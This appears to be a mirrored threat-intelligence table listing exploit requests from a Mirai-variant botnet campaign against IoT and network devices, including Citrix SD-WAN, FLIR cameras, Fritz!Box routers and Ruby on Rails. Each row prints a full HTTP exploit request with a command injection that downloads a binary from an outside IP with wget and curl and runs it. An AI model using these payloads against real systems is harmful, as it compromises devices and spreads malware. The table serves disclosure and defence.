mirror of
https://github.com/blackorbird/APT_REPORT.git
synced 2025-06-12 02:04:17 +00:00
7.2 KiB
7.2 KiB
For more details please contact * @blackorbrid
Thanks for * pan-unit42
Vulnerability | Affected Devices | Exploit Format |
---|---|---|
CVE-2019-12989, CVE-2019-12991 | Citrix SD-WAN Appliances (tested on 10.2.2) | POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % '99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1 'SSL_CLIENT_VERIFY' : 'SUCCESS' get_package_fil: site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active User-Agent: Hello-World Connection: keep-alive |
EyeLock nano NXT Remote Code Execution | EyeLock NXT Biometric Iris Readers with firmware version 3.5 | GET /scripts/rpc.php?action=updatetime×erver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1 |
Iris ID IrisAccess ICU Cross-Site Scripting | Iris ID IrisAccess ICU 7000-2 | POST /html/SetSmarcardSettings.php HTTP/1.1 Content-Length: 11660 Content-Type: application/x-www-form-urlencoded Connection: close X-Powered-By: PHP/5.5.13 User-Agent: joxypoxy/7.2.6 HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08 |
CVE-2015-4051 | Beckhoff CX9020 PLCs | POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1 User-Agent: Hello-World Host: 192.168.0.1:5120 Content-type: text/xml; charset=utf-8 SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write M-SEARCH * HTTP/1.1 HOST: 239.255.255.250:1900 MAN: ssdp:discover',0Dh,0Ah MX: 3 ST: upnp:rootdevice <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope> |
Xfinity Gateway Remote Code Execution | Xfinity Gateways | POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1 Host: 10.0.0.1:80 User-Agent: Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://10.0.0.1/network_diagnostic_tools.php Content-Length: 91 Cookie: PHPSESSID=; auth= DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: keep-alive test_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4 |
Beward N100 Authenticated Remote Code Execution | Beward N100 IP Cameras | GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.2.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1 Authorization: Basic YWRtaW46YWRtaW4= Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-type: text/plain |
Fritz!Box Webcm Command Injection - this vulnerability was first briefly seen exploited by the Muhstik botnet in January 2018. This is the first instance of exploitation by a Mirai descendant. | Several versions of Fritz!Box devices | GET /cgi-bin/webcm HTTP/1.1 var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard |
FLIR Thermal Camera Command Injection | Certain FC-Series S and PT-Series models of FLIR Cameras | POST /page/maintenance/lanSettings/dns HTTP/1.1 Host: 192.168.0.1:80 Content-Length: 64 Accept: */* Origin: http://192.168.0.1 X-Requested-With: XMLHttpRequest User-Agent: Testingus/1.0 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.1/maintenance Accept-Language: en-US,en;q=0.8,mk;q=0.6 Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b Connection: close dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60 |
Sapido RB-1732 Remote Command Execution | Sapido RB-1732 Wireless Routers | GET /goform/formSysCmd HTTP/1.1 ('<textarea rows="15" name="msg" cols="80" wrap="virtual">') ('</textarea>') {'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''} |
CVE-2016-0752 | Ruby on Rails multiple versions | POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1 Content-Type: multipart/form-data; boundary= <%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%> |
CVE-2014-3914 | Rocket ServerGraph 1.2 (tested on Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu 12.04 64 bits) | POST /SGPAdmin/fileRequest HTTP/1.1 &invoker=&title=¶ms=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query= |
CVE-2015-2208 | PHPMoAdmin installations | POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.0.1:80 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 34 object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit |